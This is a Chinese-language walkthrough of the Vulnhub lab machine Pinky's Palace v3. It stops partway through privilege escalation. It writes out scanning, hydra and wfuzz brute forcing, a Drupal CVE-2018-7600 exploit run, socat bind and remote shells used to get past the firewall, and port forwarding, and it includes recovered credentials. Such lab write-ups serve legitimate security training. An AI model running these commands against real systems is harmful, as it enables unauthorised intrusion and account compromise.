Vulnhub-PrinkysPalacev3

1、主机发现

arp-scan -l 扫描同网段

2、端口扫描

nmap -sS -sV 192.168.66.185 nmap -sS -A -T4 -p- 192.168.66.185 nmap --script=vuln 192.168.66.185

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
5555/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
8000/tcp open  http    nginx 1.10.3
这里简略扫描一下端口，简单分析一下，8000端口有个网页，5555像是ssh，21端口tcp，我们先尝试tcp匿名访问

21端口匿名访问

这里匿名访问用户名为anonymous，密码为空密码或任意密码即可登录

这里我们打开了一个文档，我们来看一下说的什么，希望我们尽量避开一些工具，这里有个Pinky可能是用户名，先保留下来 这里是有一个防火墙配置规则

访问8000端口

这里有个用户名，我们有几种方法来进入这个后台，首先就是hydra爆破一下后台，sql注入尝试或者看下源代码 我们先sql注入一下，这里sql注入应该是失败了我们爆破一下后台

hydra -l pinkadmin -P /usr/share/wordlists/rockyou.txt 192.168.66.185 http-post-form "http://192.168.66.185:8000:user=^USER^&pass=^PASS^:error"

这里源代码有些小惊喜

这里我们知道靶机的一个服务版本，找找exp吧

3、目录扫描

gobuster dir -u http://192.168.66.185:8000 -t30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dirsearch -u http://192.168.66.185:8000/ -e * -i 200 nikto -h 192.168.66.185 -p 8000

这里像是出货了的样子，我们先放一边

4、指纹识别

5、寻找exp

这里在github是可以找到的，我们下载一下

这里github和exp都提示我们这个相关漏洞，我们下载exp的吧

sudo gem install highline，记得下载这个插件，然后ruby执行44449.rb 这里我们直接就可以得到一个shell

试试github的exp

到这里我们要转换其他思路了，socat建立连接，之前我们找到了一个防火墙配置文件，大概率要绕过去了

靶机执行
python cve-2018-7600-drupal7.py -t 192.168.66.185 -c "which socat" -p 8000
python cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4444,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000
kali执行
socat FILE:`tty`,raw,echo=0 TCP:192.168.247.166:4444

6、隧道建立

python3 cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4488,reuseaddr,fork, EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000 因为这个exp脚本可以执行命令来监听一个4488端口，使用socat来绕过防火墙

python3 cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4488,reuseaddr,fork, EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000
socat FILE:`tty`,raw,echo=0 TCP:192.168.66.185:4488

这里找到了一串sql密码，dpink、drupink

我们尝试一下

7、尝试提权

pinkadmin DDLlBhU7uSuGiPBv1gqEL1QDM1G2Nf3SQOXQ6TT7zsAE3IBZAgup

这里查看一下端口信息，80和65534是本地监听，我们端口转发
socat TCP-LISTEN:4499,fork TCP:127.0.0.1:80 &
socat TCP-LISTEN:4466,fork TCP:127.0.0.1:65334 &
这里就是把80端口、65334端口用4499、4466转发

这里我们爆破一下 使用crunch命令生成指定范围内的爆破字典文件为暴力破解做准备 crunch 3 5 -f /usr/share/crunch/charset.lst lalpha -o pinkdbcrunsh gobuster dir -u http://192.168.66.185:4466 -w pinkdbcrunsh -x db

这里爆出来一个目录，我们访问一下

我们把这些密码放到文档里当作密码字典，把我们cat /etc/passwd的用户作为登录字典来扫一下，其实账号密码不算特别多，手动输入也可以 wfuzz -c -z file,./user.txt -z file,./pwds.txt -d 'user=FUZZ&pass=FUZ2Z&pin=22222' http://192.168.66.185:4499/login.php

爆出来了，用户名和密码，我们登录一下 但是看了网上的wp，这里的pin我们还要爆破一下 需要一个pin值，并且是5位纯数字，那么我们可以使用crunch进行生成5位纯数字字典 首先生成纯5位数字的pin码

这里我第一次遇到pin这个东西，学到了

crunch 5 5 -f /usr/share/crunch/charset.lst numeric -o pin.txt
wfuzz -t 150 -w pin -c -d "user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ"  http://192.168.247.166:8888/login.php

我们拿着这三个信息登录一下

一个命令执行模块

或许可以尝试以下nc连接，但是这个靶机有防火墙，我们需要socat连接 命令框输入

socat TCP-LISTEN:6666,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
kali执行
socat FILE:`tty`,raw,echo=0 TCP:192.168.66.185:6666

这条命令是将bin文件丢到html，也就是我们可以访问的页面

我们执行了之后需要一个so文件

查看函数，这个so文件的函数